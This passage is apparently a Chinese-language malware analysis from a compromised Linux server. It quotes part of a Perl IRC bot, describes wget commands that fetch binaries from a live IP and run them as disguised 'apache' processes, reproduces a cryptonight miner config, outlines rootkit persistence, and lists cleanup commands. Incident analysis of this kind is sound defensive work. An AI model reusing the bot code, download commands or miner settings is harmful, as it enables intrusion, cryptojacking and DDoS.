}
sub Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
my $d_time = $ftime-$itime;
my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};
my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
my $porcen = ($cur_byte*100)/$bytes_total;
my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
}
return(0);
}
sub fixaddr {
my ($address) = @_;
chomp $address;
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return $address;
} elsif ($address =~ tr/a-zA-Z//) {
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}
这个perl代码,主要是与IRC服务器通讯,通讯的目的是让“对方”控制当前主机;猜测其主要作用是控制下载真正的木马程序并发起DDOS攻击。
前面的shell脚本代码中的 wget http://65.254.63.20/apache 和 wget http://65.254.63.20/apacheaes 是下载可执行程序,完成下载后被更名为apache和apache2并启动;所下载的 http://65.254.63.20/httpd.conf 文件是作为这两个可执行程序的配置文件,内容如下:
{
"url" : "stratum+tcp://176.9.147.78:45560",
"url" : "stratum+tcp://176.9.2.145:45560",
"url" : "stratum+tcp://176.9.147.178:45560",
"user" : "bl4ckbone@protonmail.com",
"pass" : "x",
"algo" : "cryptonight",
"quiet" : true
}
猜测的下一步动作:
上面的perl程序和apache、apache2程序运行一定时间后,会自动下载名称为 xxxxxLinux 可执行程序(其中 xxxxx 是随机名称),这个文件被执行以后,会释放出一些可执行程序 以替换掉系统中的相应可执行程序(如 ps,lsof,ss,netstat 等)。/etc/cron.daily/目录下会产生相应的执行文件。/etc/rc.d/rc.local 被修改加入相应执行程序完整路径,/etc/rc.local软链接被删除并复制修改后的/etc/rc.d/rc.local文件过来(充当/etc/rc.local文件)。
一些有用的命令:
(1)查找根路径(/)下最近50天内被修改的可执行文件: find / -type f -perm /111 -mtime -50
(2)查看指定文件的可修改属性: lsattr /etc/rc.d/rc.local # 显示内容如下:
-------------e-- /etc/rc.d/rc.local
(3)设置指定文件为禁止修改: chattr +i /etc/rc.d/rc.local # 执行后该文件不允许删除[ rm -f ]和修改,注意只能对root用户组的文件进行设置
# lsattr /etc/rc.d/rc.local
----i--------e-- /etc/rc.d/rc.local # 注意这里第5列为字母i
(4)设置指定文件为允许修改: chattr -i /etc/rc.d/rc.local # 恢复为可删除和修改
(5)强制退出指定用户登录: pkill -9 -t pts/1 # 这里的 pts/1 是执行 w 命令以后相应已登录用户的TTY列内容
(6)获得指定可执行文件的文本内容: strings /root/xxxxxLinux2.6>strings_Linux26.txt # 用于查看和分析木马程序中的可疑文本,如 IP地址或域名
<<后续根据情况再修改>>